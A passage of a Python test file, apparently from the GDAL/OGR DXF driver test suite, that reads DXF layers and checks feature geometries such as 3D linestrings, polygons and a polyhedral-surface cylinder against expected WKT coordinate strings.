# 6.56675073280394 2.57117724650959 -0.352446665345325,6.49484910306015 2.57971122181598 -0.330432403415945,6.41810066848813 2.5805490028417 -0.311027496746741,6.3368793397464 2.5736865080018 -0.294326484092429,6.25158081898424 2.55915717068134 -0.280410731107883,6.16262067202063 2.53703177635124 -0.269348033942836,6.07043230374933 2.50741811770866 -0.261192288945857,5.97546484663382 2.47046046952174 -0.255983230086761,5.87818097257907 2.42633888573748 -0.253746235376694,5.77905463884053 2.37526832227698 -0.254492203229023,5.67856877895203 2.31749758979185 -0.258217499363356,5.57721294992215 2.25330814148364 -0.264903974511391,5.47548094716167 2.18301270189222 -0.27451905283833,5.37386839876197 2.1069537433332 -0.287015890649068,5.2728703508448 2.02550181740726 -0.302333604605968,5.17297885574732 1.93905374971 -0.320397568346365,5.07468057479259 1.8480307065375 -0.341119776054697,4.97845440732451 1.7528761430065 -0.364399271218,4.88476915755836 1.65405364258562 -0.390122638475884,4.79408125061381 1.5520446585633 -0.418164556168773,4.70683250885755 1.4473461684558 -0.44838840689243,4.62344799938923 1.34046825278266 -0.48064694308422,4.54433396315718 1.23193161000571 -0.514783004398435,4.46987583579342 1.1222650197385 -0.550630283375696,4.40043636980995 1.01200276658516 -0.588014135676182,4.33635386730502 0.901682037159526 -0.626752430929296,4.27794053178928 0.791840302965968 -0.666656440054525,4.22548094716167 0.68301270189222 -0.707531754730549,4.17923069124529 0.575729431071401 -0.749179234533037,4.13941509063789 0.470513163814874 -0.791395977126782,4.10622812294338 0.36787650320041 -0.833976306785479,4.07983147173244 0.268319484721523 -0.876712776423191,4.06035373883638 0.172327140164803 -0.919397178255699,4.04788981781196 0.080367134583816 -0.961821558167894,4.04250043162957 -0.007112512118036 -1.00377922884533,4.04421183683692 -0.089685607895445 -1.04506577673403,4.0530156956399 -0.166949864926001 -1.0854800579228,4.06886911652336 -0.238528859516028 -1.12482517809611,4.09169486321435 -0.304073865998978 -1.16290945178344,4.12138173096942 -0.363265555691829 -1.1995473362316,4.15778508835299 -0.415815552632322 -1.23456033535038,4.20072758186713 -0.461467838517673 -1.26777786932757,4.25 -0.5 -1.29903810567666)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (4.25 -0.5 -1.29903810567666,4.30536229248331 -0.531224312261799 -1.32818874766841,4.36654473979309 -0.554988653592388 -1.35508777630525,4.43324926719606 -0.571177246509588 -1.37960414222355,4.50515089693985 -0.579711221815978 -1.40161840415293,4.58189933151187 -0.580549002841697 -1.42102331082214,4.6631206602536 -0.573686508001801 -1.43772432347645,4.74841918101576 -0.559157170681335 -1.451640076461,4.83737932797937 -0.53703177635124 -1.46270277362604,4.92956769625067 -0.507418117708657 -1.47085851862302,5.02453515336618 -0.470460469521736 -1.47606757748212,5.12181902742094 -0.426338885737475 -1.47830457219218,5.22094536115948 -0.375268322276984 -1.47755860433986,5.32143122104797 -0.317497589791849 -1.47383330820552,5.42278705007785 -0.253308141483641 -1.46714683305749,5.52451905283833 -0.183012701892219 -1.45753175473055,5.62613160123803 -0.106953743333199 -1.44503491691981,5.7271296491552 -0.025501817407262 -1.42971720296291,5.82702114425268 0.060946250290002 -1.41165323922251,5.92531942520741 0.151969293462501 -1.39093103151418,6.02154559267549 0.247123856993501 -1.36765153635088,6.11523084244164 0.345946357414384 -1.34192816909299,6.2059187493862 0.4479553414367 -1.31388625140011,6.29316749114245 0.552653831544204 -1.28366240067645,6.37655200061077 0.659531747217344 -1.25140386448466,6.45566603684282 0.768068389994292 -1.21726780317044,6.53012416420658 0.877734980261504 -1.18142052419318,6.59956363019005 0.987997233414845 -1.1440366718927,6.66364613269498 1.09831796284048 -1.10529837663958,6.72205946821072 1.20815969703403 -1.06539436751435,6.77451905283833 1.31698729810778 -1.02451905283833,6.82076930875472 1.4242705689286 -0.982871573035841,6.86058490936212 1.52948683618513 -0.940654830442097,6.89377187705662 1.63212349679959 -0.898074500783399,6.92016852826756 1.73168051527848 -0.855338031145687,6.93964626116363 1.8276728598352 -0.81265362931318,6.95211018218804 1.91963286541618 -0.770229249400985,6.95749956837044 2.00711251211804 -0.72827157872355,6.95578816316308 2.08968560789544 -0.686985030834846,6.9469843043601 2.166949864926 -0.646570749646076,6.93113088347664 2.23852885951603 -0.607225629472764,6.90830513678565 2.30407386599898 -0.569141355785437,6.87861826903058 2.36326555569183 -0.53250347133728,6.84221491164701 2.41581555263232 -0.497490472218499,6.79927241813288 2.46146783851767 -0.464272938241304,6.75 2.5 -0.43301270189222,6.69463770751669 2.5312243122618 -0.40386205990047,' + \
'6.63345526020692 2.55498865359239 -0.376963031263626,6.56675073280394 2.57117724650959 -0.352446665345325,6.49484910306015 2.57971122181598 -0.330432403415945,6.41810066848813 2.5805490028417 -0.311027496746741,6.3368793397464 2.5736865080018 -0.294326484092429,6.25158081898424 2.55915717068134 -0.280410731107883,6.16262067202063 2.53703177635124 -0.269348033942836,6.07043230374933 2.50741811770866 -0.261192288945857,5.97546484663382 2.47046046952174 -0.255983230086761,5.87818097257907 2.42633888573748 -0.253746235376694,5.77905463884053 2.37526832227698 -0.254492203229023,5.67856877895203 2.31749758979185 -0.258217499363356,5.57721294992215 2.25330814148364 -0.264903974511391,5.47548094716167 2.18301270189222 -0.27451905283833,5.37386839876197 2.1069537433332 -0.287015890649068,5.2728703508448 2.02550181740726 -0.302333604605968,5.17297885574732 1.93905374971 -0.320397568346365,5.07468057479259 1.8480307065375 -0.341119776054697,4.97845440732451 1.7528761430065 -0.364399271218,4.88476915755836 1.65405364258562 -0.390122638475884,4.79408125061381 1.5520446585633 -0.418164556168773,4.70683250885755 1.4473461684558 -0.44838840689243,4.62344799938923 1.34046825278266 -0.48064694308422,4.54433396315718 1.23193161000571 -0.514783004398435,4.46987583579342 1.1222650197385 -0.550630283375696,4.40043636980995 1.01200276658516 -0.588014135676182,4.33635386730502 0.901682037159526 -0.626752430929296,4.27794053178928 0.791840302965968 -0.666656440054525,4.22548094716167 0.68301270189222 -0.707531754730549,4.17923069124529 0.575729431071401 -0.749179234533037,4.13941509063789 0.470513163814874 -0.791395977126782,4.10622812294338 0.36787650320041 -0.833976306785479,4.07983147173244 0.268319484721523 -0.876712776423191,4.06035373883638 0.172327140164803 -0.919397178255699,4.04788981781196 0.080367134583816 -0.961821558167894,4.04250043162957 -0.007112512118036 -1.00377922884533,4.04421183683692 -0.089685607895445 -1.04506577673403,4.0530156956399 -0.166949864926001 -1.0854800579228,4.06886911652336 -0.238528859516028 -1.12482517809611,4.09169486321435 -0.304073865998978 -1.16290945178344,4.12138173096942 -0.363265555691829 -1.1995473362316,4.15778508835299 -0.415815552632322 -1.23456033535038,4.20072758186713 -0.461467838517673 -1.26777786932757,4.25 -0.5 -1.29903810567666)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):61
# EntityHandle (String) = 203
# LINESTRING Z (2.75 0.5 -0.43301270189222,2.75597796157458 0.457022294808167 -0.455760312055479,2.76522760095779 0.414850974295674 -0.478918395607368,2.77770451483146 0.37368848382115 -0.502375781105475,2.79334880719819 0.333732425808347 -0.526019860294666,2.81208537691484 0.295174611146642 -0.549737128688177,2.83382427821898 0.258200138394064 -0.573413730451116,2.85846115251769 0.222986505203176 -0.596936004970611,2.88587772936573 0.189702756235451 -0.620191032488805,2.91594239422828 0.15850867165462 -0.643067176179329,2.94851082030252 0.129554000094665 -0.66545461806501,2.98342666136509 0.102977739784634 -0.687245886204105,3.02052230231928 0.078907471281269 -0.708336370614292,3.05961966383903 0.057458745012683 -0.728624825457685,3.10053105724686 0.038734526573237 -0.748013855076124,3.14306008552201 0.022824702432479 -0.766410381543502,3.18700258611332 0.009805648431019 -0.783726091490617,3.23214761103096 -0.00026013686519 -0.79987786005755,3.27827843951188 -0.007324332192091 -0.814788149938374,3.32517361839783 -0.011353025555964 -0.828385383602543,3.37260802523135 -0.012326877029509 -0.84060428690611,3.42035394896652 -0.010241211594056 -0.851386202443257,3.46818218310621 -0.0051060415822 -0.860679371133851,3.51586312601842 0.003053981386852 -0.868439180695292,3.56316788314946 0.014199684748517 -0.874628379805819,3.60986936584274 0.028277563042523 -0.879217256931186,3.65574338148826 0.045220034768334 -0.882183782956251,3.70056970976957 0.064945766813234 -0.883513716936746,3.74413315984144 0.087360064895672 -0.883200674463593,3.78622460336345 0.112355328149502 -0.881246158311542,3.82664197843012 0.139811565666877 -0.87765955122504,3.86519125957839 0.169596972520106 -0.872458070875934,3.90168738921576 0.201568562497258 -0.865666687209244,3.93595516599773 0.235572854514029 -0.857318002573801,3.96783008588991 0.271446609406727 -0.847452095213172,3.99715913187718 0.30901761356937 -0.836116326868217,4.02380150852887 0.348105505672996 -0.823365115414876,4.04762931789371 0.3885226424985 -0.809259673628662,4.06852817347981 0.430074999726512 -0.793867715329923,4.08639774937224 0.472563103360048 -0.777263130320539,4.10115226185219 0.515782987308575 -0.759525629672545,4.1127208812057 0.559527172536592 -0.740740363071464,4.12104807174486 0.603585663076254 -0.720997510051345,4.12609385840951 0.647746954122649 -0.700391847083764,4.1278340186693 0.691799047372318 -0.679022292599034,4.12626019880507 0.735530468730831 -0.656991432123733,4.12137995401128 0.778731283503886 -0.634405025814187,4.11321671212692 0.821194104198432 -0.61137150074998,4.10180966116915 0.862715086095846 -0.588001430424789,4.08721356120934 0.903094905817856 -0.564407003933257,4.06949848149492 0.942139718187561 -0.540701487402092,4.04874946407869 0.979662086792094 -0.516998680250836,4.02506611557057 1.01548188377972 -0.493412368892526,3.99856212897149 1.04942715457186 -0.470055780496802,3.96936473788492 1.08133494333891 -0.447041039437686,3.93761410572614 1.11105207527721 -0.424478629035376,3.9034626528613 1.13843589193168 -0.402476861176005,3.86707432490649 1.16335493603432 -0.381141356355458,3.8286238056993 1.1856895825708 -0.360574536643342,3.78829567872099 1.20533261304587 -0.340875134001137,3.74628354099508 1.22218973019068 -0.322137716314888,3.70278907371594 1.23618001064108 -0.304452233417734,3.65802107406893 1.247236293414 -0.287903585281599,3.61219445288998 1.25530550231681 -0.27257121445099,3.56552920297626 1.26034890074202 -0.258528724675415,3.51824934300062 1.26234227762414 -0.245843527571206,3.47058184209972 1.26127606366599 -0.234576519008966,3.42275553029828 1.2571553772766 -0.224781786780142,3.375 1.25 -0.21650635094611)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2.75 0.5 -0.43301270189222,2.75597796157458 0.457022294808167 -0.455760312055479,2.76522760095779 0.414850974295674 -0.478918395607368,2.77770451483146 0.37368848382115 -0.502375781105475,2.79334880719819 0.333732425808347 -0.526019860294666,2.81208537691484 0.295174611146642 -0.549737128688177,2.83382427821898 0.258200138394064 -0.573413730451116,2.85846115251769 0.222986505203176 -0.596936004970611,2.88587772936573 0.189702756235451 -0.620191032488805,2.91594239422828 0.15850867165462 -0.643067176179329,2.94851082030252 0.129554000094665 -0.66545461806501,2.98342666136509 0.102977739784634 -0.687245886204105,3.02052230231928 0.078907471281269 -0.708336370614292,3.05961966383903 0.057458745012683 -0.728624825457685,3.10053105724686 0.038734526573237 -0.748013855076124,3.14306008552201 0.022824702432479 -0.766410381543502,3.18700258611332 0.009805648431019 -0.783726091490617,3.23214761103096 -0.00026013686519 -0.79987786005755,3.27827843951188 -0.007324332192091 -0.814788149938374,3.32517361839783 -0.011353025555964 -0.828385383602543,3.37260802523135 -0.012326877029509 -0.84060428690611,3.42035394896652 -0.010241211594056 -0.851386202443257,3.46818218310621 -0.0051060415822 -0.860679371133851,3.51586312601842 0.003053981386852 -0.868439180695292,3.56316788314946 0.014199684748517 -0.874628379805819,3.60986936584274 0.028277563042523 -0.879217256931186,3.65574338148826 0.045220034768334 -0.882183782956251,3.70056970976957 0.064945766813234 -0.883513716936746,3.74413315984144 0.087360064895672 -0.883200674463593,3.78622460336345 0.112355328149502 -0.881246158311542,3.82664197843012 0.139811565666877 -0.87765955122504,3.86519125957839 0.169596972520106 -0.872458070875934,3.90168738921576 0.201568562497258 -0.865666687209244,3.93595516599773 0.235572854514029 -0.857318002573801,3.96783008588991 0.271446609406727 -0.847452095213172,3.99715913187718 0.30901761356937 -0.836116326868217,4.02380150852887 0.348105505672996 -0.823365115414876,4.04762931789371 0.3885226424985 -0.809259673628662,4.06852817347981 0.430074999726512 -0.793867715329923,4.08639774937224 0.472563103360048 -0.777263130320539,4.10115226185219 0.515782987308575 -0.759525629672545,4.1127208812057 0.559527172536592 -0.740740363071464,4.12104807174486 0.603585663076254 -0.720997510051345,4.12609385840951 0.647746954122649 -0.700391847083764,4.1278340186693 0.691799047372318 -0.679022292599034,4.12626019880507 0.735530468730831 -0.656991432123733,4.12137995401128 0.778731283503886 -0.634405025814187,4.11321671212692 0.821194104198432 -0.61137150074998,4.10180966116915 0.862715086095846 -0.588001430424789,4.08721356120934 0.903094905817856 -0.564407003933257,4.06949848149492 0.942139718187561 -0.540701487402092,4.04874946407869 0.979662086792094 -0.516998680250836,4.02506611557057 1.01548188377972 -0.493412368892526,3.99856212897149 1.04942715457186 -0.470055780496802,3.96936473788492 1.08133494333891 -0.447041039437686,3.93761410572614 1.11105207527721 -0.424478629035376,3.9034626528613 1.13843589193168 -0.402476861176005,3.86707432490649 1.16335493603432 -0.381141356355458,3.8286238056993 1.1856895825708 -0.360574536643342,3.78829567872099 1.20533261304587 -0.340875134001137,3.74628354099508 1.22218973019068 -0.322137716314888,3.70278907371594 1.23618001064108 -0.304452233417734,3.65802107406893 1.247236293414 -0.287903585281599,3.61219445288998 1.25530550231681 -0.27257121445099,3.56552920297626 1.26034890074202 -0.258528724675415,3.51824934300062 1.26234227762414 -0.245843527571206,3.47058184209972 1.26127606366599 -0.234576519008966,3.42275553029828 1.2571553772766 -0.224781786780142,3.375 1.25 -0.21650635094611)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):62
# EntityHandle (String) = 204
# POLYGON Z ((2.125 -0.25 -0.649519052838329,2.875 -0.75 -1.08253175473055,3.5 0.0 -0.866025403784439,2.75 0.5 -0.43301270189222,2.125 -0.25 -0.649519052838329))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((2.125 -0.25 -0.649519052838329,2.875 -0.75 -1.08253175473055,3.5 0.0 -0.866025403784439,2.75 0.5 -0.43301270189222,2.125 -0.25 -0.649519052838329))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):63
# EntityHandle (String) = 205
# POLYGON Z ((4.875 0.25 -1.08253175473055,5.5 1.0 -0.866025403784439,4.75 1.5 -0.43301270189222,4.125 0.75 -0.649519052838329,4.875 0.25 -1.08253175473055))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((4.875 0.25 -1.08253175473055,5.5 1.0 -0.866025403784439,4.75 1.5 -0.43301270189222,4.125 0.75 -0.649519052838329,4.875 0.25 -1.08253175473055))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):64
# EntityHandle (String) = 207
# POLYGON Z ((11 2 -1.73205080756888,11.625 2.75 -1.51554445662277,12.375 2.25 -1.94855715851499,11.75 1.5 -2.1650635094611,11 2 -1.73205080756888))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((11 2 -1.73205080756888,11.625 2.75 -1.51554445662277,12.375 2.25 -1.94855715851499,11.75 1.5 -2.1650635094611,11 2 -1.73205080756888))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):65
# EntityHandle (String) = 208
# LINESTRING (2.75 0.5,2.96153846153846 0.538461538461539,3.17307692307692 0.576923076923077,3.38461538461539 0.615384615384616,3.59615384615385 0.653846153846154,3.80769230769231 0.692307692307693,4.01923076923077 0.730769230769231,4.23076923076923 0.76923076923077,4.44230769230769 0.807692307692308,4.65384615384616 0.846153846153847,4.86538461538462 0.884615384615385,5.07692307692308 0.923076923076924,5.28846153846154 0.961538461538462,5.5 1.0,5.71153846153846 1.03846153846154,5.92307692307693 1.07692307692308,6.13461538461539 1.11538461538462,6.34615384615385 1.15384615384615,6.55769230769231 1.19230769230769,6.76923076923077 1.23076923076923,6.98076923076923 1.26923076923077,7.19230769230769 1.30769230769231,7.40384615384616 1.34615384615385,7.61538461538462 1.38461538461539,7.82692307692308 1.42307692307692,8.03846153846154 1.46153846153846,8.25 1.5,8.46153846153846 1.53846153846154,8.67307692307693 1.57692307692308,8.88461538461539 1.61538461538462,9.09615384615385 1.65384615384615,9.30769230769231 1.69230769230769,9.51923076923077 1.73076923076923,9.73076923076923 1.76923076923077,9.94230769230769 1.80769230769231,10.1538461538462 1.84615384615385,10.3653846153846 1.88461538461539,10.5769230769231 1.92307692307692,10.7884615384615 1.96153846153846,11.0 2.0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (2.75 0.5,2.96153846153846 0.538461538461539,3.17307692307692 0.576923076923077,3.38461538461539 0.615384615384616,3.59615384615385 0.653846153846154,3.80769230769231 0.692307692307693,4.01923076923077 0.730769230769231,4.23076923076923 0.76923076923077,4.44230769230769 0.807692307692308,4.65384615384616 0.846153846153847,4.86538461538462 0.884615384615385,5.07692307692308 0.923076923076924,5.28846153846154 0.961538461538462,5.5 1.0,5.71153846153846 1.03846153846154,5.92307692307693 1.07692307692308,6.13461538461539 1.11538461538462,6.34615384615385 1.15384615384615,6.55769230769231 1.19230769230769,6.76923076923077 1.23076923076923,6.98076923076923 1.26923076923077,7.19230769230769 1.30769230769231,7.40384615384616 1.34615384615385,7.61538461538462 1.38461538461539,7.82692307692308 1.42307692307692,8.03846153846154 1.46153846153846,8.25 1.5,8.46153846153846 1.53846153846154,8.67307692307693 1.57692307692308,8.88461538461539 1.61538461538462,9.09615384615385 1.65384615384615,9.30769230769231 1.69230769230769,9.51923076923077 1.73076923076923,9.73076923076923 1.76923076923077,9.94230769230769 1.80769230769231,10.1538461538462 1.84615384615385,10.3653846153846 1.88461538461539,10.5769230769231 1.92307692307692,10.7884615384615 1.96153846153846,11.0 2.0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):66
# EntityHandle (String) = 209
# LINESTRING (5.75 5.5,5.5082446180819 5.22760624757667,5.26788002157825 4.95546536522868,5.03029699590351 4.68383022303141,4.79688632647213 4.4129536910602,4.56903879869856 4.14308863939042,4.34814519799727 3.87448793809741,4.1355963097827 3.60740445725653,3.93278291946931 3.34209106694314,3.74109581247155 3.07880063723259,3.56192577420388 2.81778603820024,3.39666359008075 2.55930013992144,3.24670004551661 2.30359581247155,3.11342592592593 2.05092592592593,2.99823201672314 1.80154335035992,2.90250910332271 1.55570095584889,2.8276479711391 1.31365161246818,2.77503940558674 1.07564819029316,2.74607419208011 0.84194355939918,2.74214311603365 0.612790589861594,2.76457901346955 0.38843161550262,2.8133818843878 0.168866636322256,2.88721889276623 -0.046146681501713,2.98469925319038 -0.256861208044643,3.10443218024579 -0.463529813381887,3.24502688851802 -0.666405367588803,3.4050925925926 -0.865740740740744,3.58323850705508 -1.06178880291307,3.77807384649101 -1.25480242418113,3.98820782548594 -1.44503447462028,4.21224965862541 -1.63273782430588,4.44880856049496 -1.81816534331328,4.69649374568015 -2.00156990171784,4.95391442876651 -2.18320436959491,5.2196798243396 -2.36332161701985,5.49239914698496 -2.54217451406801,5.77068161128813 -2.72001593081475,6.05313643183467 -2.89709873733543,6.33837282321012 -3.0736758037054,6.625 -3.25)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (5.75 5.5,5.5082446180819 5.22760624757667,5.26788002157825 4.95546536522868,5.03029699590351 4.68383022303141,4.79688632647213 4.4129536910602,4.56903879869856 4.14308863939042,4.34814519799727 3.87448793809741,4.1355963097827 3.60740445725653,3.93278291946931 3.34209106694314,3.74109581247155 3.07880063723259,3.56192577420388 2.81778603820024,3.39666359008075 2.55930013992144,3.24670004551661 2.30359581247155,3.11342592592593 2.05092592592593,2.99823201672314 1.80154335035992,2.90250910332271 1.55570095584889,2.8276479711391 1.31365161246818,2.77503940558674 1.07564819029316,2.74607419208011 0.84194355939918,2.74214311603365 0.612790589861594,2.76457901346955 0.38843161550262,2.8133818843878 0.168866636322256,2.88721889276623 -0.046146681501713,2.98469925319038 -0.256861208044643,3.10443218024579 -0.463529813381887,3.24502688851802 -0.666405367588803,3.4050925925926 -0.865740740740744,3.58323850705508 -1.06178880291307,3.77807384649101 -1.25480242418113,3.98820782548594 -1.44503447462028,4.21224965862541 -1.63273782430588,4.44880856049496 -1.81816534331328,4.69649374568015 -2.00156990171784,4.95391442876651 -2.18320436959491,5.2196798243396 -2.36332161701985,5.49239914698496 -2.54217451406801,5.77068161128813 -2.72001593081475,6.05313643183467 -2.89709873733543,6.33837282321012 -3.0736758037054,6.625 -3.25)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):67
# EntityHandle (String) = 20A
# POINT Z (9.625 1.75 -1.51554445662277)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (9.625 1.75 -1.51554445662277)'):
feat.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test 3D entities (polyface mesh, cylinder)
def ogr_dxf_33():
ds = ogr.Open('data/3d.dxf')
layer = ds.GetLayer(0)
# Polyface mesh (POLYLINE)
feat = layer.GetNextFeature()
if feat.Layer != '0':
return 'fail #1'
geom = feat.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbPolyhedralSurfaceZ:
gdaltest.post_reason( 'did not get expected geometry type; got %s instead of wkbPolyhedralSurface', geom.GetGeometryType() )
return 'fail #2'
wkt_string = geom.ExportToIsoWkt()
wkt_string_expected = 'POLYHEDRALSURFACE Z (((0 0 0,1 0 0,1 1 0,0 1 0,0 0 0)),((0 0 0,1 0 0,1 0 1,0 0 1,0 0 0)),((1 0 0,1 1 0,1 1 1,1 0 1,1 0 0)),((1 1 0,1 1 1,0 1 1,0 1 0,1 1 0)),((0 0 0,0 1 0,0 1 1,0 0 1,0 0 0)),((0 0 1,1 0 1,1 1 1,0 1 1,0 0 1)))'
if wkt_string != wkt_string_expected:
feat.DumpReadable()
gdaltest.post_reason( 'wrong geometry for polyface mesh' )
return 'fail'
faces = geom.GetGeometryCount()
if faces != 6:
gdaltest.post_reason( 'did not get expected number of faces, got %d instead of %d', faces, 6)
return 'fail'
# Cylinder (CIRCLE with thickness)
feat = layer.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYHEDRALSURFACE Z (((2.8 -0.0 1e-31,2.79902562010393 -0.0 -0.0279025894976501,2.79610722749663 -0.0 -0.0556692403840262,2.79125904029352 -0.0 -0.0831646763271037,2.78450467837533 -0.0 -0.1102549423268,2.77587704831436 -0.0 -0.136808057330267,2.76541818305704 -0.0 -0.16269465723032,2.75317903714357 -0.0 -0.187788625114356,2.73921923846257 -0.0 -0.211967705693282,2.72360679774998 0.0 -0.235114100916989,2.70641777724759 0.0 -0.257115043874616,2.68773592013546 0.0 -0.277863348183599,2.66765224254354 0.0 -0.297257930190958,2.64626459013026 0.0 -0.315204301442689,2.6236771613883 0.0 -0.331615029022017,2.6 0.0 -0.346410161513775,2.57534845871563 0.0 -0.359517618519667,2.54984263736636 0.0 -0.370873541826715,2.52360679774998 0.0 -0.380422606518061,2.49676875823987 0.0 -0.388118290510399,2.46945927106677 0.0 -0.393923101204883,2.44181138530706 0.0 -0.397808758147309,2.413959798681 0.0 -0.399756330807638,2.386040201319 0.0 -0.399756330807638,2.35818861469294 0.0 -0.397808758147309,2.33054072893323 0.0 -0.393923101204883,2.30323124176013 0.0 -0.388118290510399,2.27639320225002 0.0 -0.380422606518061,2.25015736263363 0.0 -0.370873541826715,2.22465154128437 0.0 -0.359517618519667,2.2 0.0 -0.346410161513776,2.1763228386117 0.0 -0.331615029022017,2.15373540986974 0.0 -0.315204301442689,2.13234775745646 0.0 -0.297257930190958,2.11226407986454 0.0 -0.277863348183599,2.09358222275241 0.0 -0.257115043874616,2.07639320225002 0.0 -0.235114100916989,2.06078076153743 0.0 -0.211967705693282,2.04682096285643 0.0 -0.187788625114356,2.03458181694296 0.0 -0.16269465723032,2.02412295168564 0.0 -0.136808057330268,2.01549532162467 0.0 -0.1102549423268,2.00874095970648 0.0 -0.0831646763271037,2.00389277250337 0.0 -0.0556692403840263,2.00097437989607 0.0 -0.0279025894976502,' +
'2.0 0.0 -4.8985871965894e-17,2.00097437989607 0.0 0.0279025894976499,2.00389277250337 0.0 0.0556692403840262,2.00874095970648 0.0 0.0831646763271036,2.01549532162467 0.0 0.1102549423268,2.02412295168564 0.0 0.136808057330267,2.03458181694296 0.0 0.16269465723032,2.04682096285643 0.0 0.187788625114356,2.06078076153743 0.0 0.211967705693282,2.07639320225002 0.0 0.235114100916989,2.09358222275241 0.0 0.257115043874616,2.11226407986454 0.0 0.277863348183599,2.13234775745646 0.0 0.297257930190958,2.15373540986974 0.0 0.315204301442689,2.1763228386117 -0.0 0.331615029022017,2.2 -0.0 0.346410161513775,2.22465154128437 -0.0 0.359517618519667,2.25015736263363 -0.0 0.370873541826715,2.27639320225002 -0.0 0.380422606518061,2.30323124176013 -0.0 0.388118290510399,2.33054072893323 -0.0 0.393923101204883,2.35818861469294 -0.0 0.397808758147309,2.386040201319 -0.0 0.399756330807638,2.413959798681 -0.0 0.399756330807638,2.44181138530706 -0.0 0.397808758147309,2.46945927106677 -0.0 0.393923101204883,2.49676875823987 -0.0 0.388118290510399,2.52360679774998 -0.0 0.380422606518061,2.54984263736636 -0.0 0.370873541826715,2.57534845871563 -0.0 0.359517618519667,2.6 -0.0 0.346410161513775,2.6236771613883 -0.0 0.331615029022017,2.64626459013026 -0.0 0.315204301442689,2.66765224254354 -0.0 0.297257930190958,2.68773592013546 -0.0 0.277863348183599,2.70641777724759 -0.0 0.257115043874616,2.72360679774998 -0.0 0.235114100916989,2.73921923846257 -0.0 0.211967705693282,2.75317903714357 -0.0 0.187788625114356,2.76541818305704 -0.0 0.16269465723032,2.77587704831436 -0.0 0.136808057330267,2.78450467837533 -0.0 0.1102549423268,2.79125904029352 -0.0 0.0831646763271039,2.79610722749663 -0.0 0.0556692403840264,2.79902562010393 -0.0 0.0279025894976499,2.8 -0.0 1e-31)),' +
'((2.8 1.8 3.6e-16,2.79902562010393 1.8 -0.0279025894976498,2.79610722749663 1.8 -0.0556692403840258,2.79125904029352 1.8 -0.0831646763271034,2.78450467837533 1.8 -0.110254942326799,2.77587704831436 1.8 -0.136808057330267,2.76541818305704 1.8 -0.16269465723032,2.75317903714357 1.8 -0.187788625114356,2.73921923846257 1.8 -0.211967705693282,2.72360679774998 1.8 -0.235114100916989,2.70641777724759 1.8 -0.257115043874615,2.68773592013546 1.8 -0.277863348183599,2.66765224254354 1.8 -0.297257930190957,2.64626459013026 1.8 -0.315204301442689,2.6236771613883 1.8 -0.331615029022016,2.6 1.8 -0.346410161513775,2.57534845871563 1.8 -0.359517618519667,2.54984263736636 1.8 -0.370873541826715,2.52360679774998 1.8 -0.380422606518061,2.49676875823987 1.8 -0.388118290510398,2.46945927106677 1.8 -0.393923101204883,2.44181138530706 1.8 -0.397808758147309,2.413959798681 1.8 -0.399756330807638,2.386040201319 1.8 -0.399756330807638,2.35818861469294 1.8 -0.397808758147309,2.33054072893323 1.8 -0.393923101204883,2.30323124176013 1.8 -0.388118290510398,2.27639320225002 1.8 -0.380422606518061,2.25015736263363 1.8 -0.370873541826715,2.22465154128437 1.8 -0.359517618519666,2.2 1.8 -0.346410161513775,2.1763228386117 1.8 -0.331615029022016,2.15373540986974 1.8 -0.315204301442689,2.13234775745646 1.8 -0.297257930190957,2.11226407986454 1.8 -0.277863348183599,2.09358222275241 1.8 -0.257115043874615,2.07639320225002 1.8 -0.235114100916989,2.06078076153743 1.8 -0.211967705693282,2.04682096285643 1.8 -0.187788625114356,2.03458181694296 1.8 -0.16269465723032,2.02412295168564 1.8 -0.136808057330267,2.01549532162467 1.8 -0.1102549423268,2.00874095970648 1.8 -0.0831646763271034,2.00389277250337 1.8 -0.0556692403840259,2.00097437989607 1.8 -0.0279025894976499,2.0 1.8 3.11014128034106e-16,' +
'2.00097437989607 1.8 0.0279025894976503,2.00389277250337 1.8 0.0556692403840266,2.00874095970648 1.8 0.083164676327104,2.01549532162467 1.8 0.1102549423268,2.02412295168564 1.8 0.136808057330268,2.03458181694296 1.8 0.16269465723032,2.04682096285643 1.8 0.187788625114357,2.06078076153743 1.8 0.211967705693282,2.07639320225002 1.8 0.23511410091699,2.09358222275241 1.8 0.257115043874616,2.11226407986454 1.8 0.277863348183599,2.13234775745646 1.8 0.297257930190958,2.15373540986974 1.8 0.315204301442689,2.1763228386117 1.8 0.331615029022017,2.2 1.8 0.346410161513776,2.22465154128437 1.8 0.359517618519667,2.25015736263363 1.8 0.370873541826715,2.27639320225002 1.8 0.380422606518062,2.30323124176013 1.8 0.388118290510399,2.33054072893323 1.8 0.393923101204884,2.35818861469294 1.8 0.39780875814731,2.386040201319 1.8 0.399756330807639,2.413959798681 1.8 0.399756330807639,2.44181138530706 1.8 0.39780875814731,2.46945927106677 1.8 0.393923101204884,2.49676875823987 1.8 0.388118290510399,2.52360679774998 1.8 0.380422606518062,2.54984263736636 1.8 0.370873541826715,2.57534845871563 1.8 0.359517618519667,2.6 1.8 0.346410161513776,2.6236771613883 1.8 0.331615029022017,2.64626459013026 1.8 0.315204301442689,2.66765224254354 1.8 0.297257930190958,2.68773592013546 1.8 0.277863348183599,2.70641777724759 1.8 0.257115043874616,2.72360679774998 1.8 0.23511410091699,2.73921923846257 1.8 0.211967705693283,2.75317903714357 1.8 0.187788625114357,2.76541818305704 1.8 0.16269465723032,2.77587704831436 1.8 0.136808057330268,2.78450467837533 1.8 0.1102549423268,2.79125904029352 1.8 0.0831646763271043,2.79610722749663 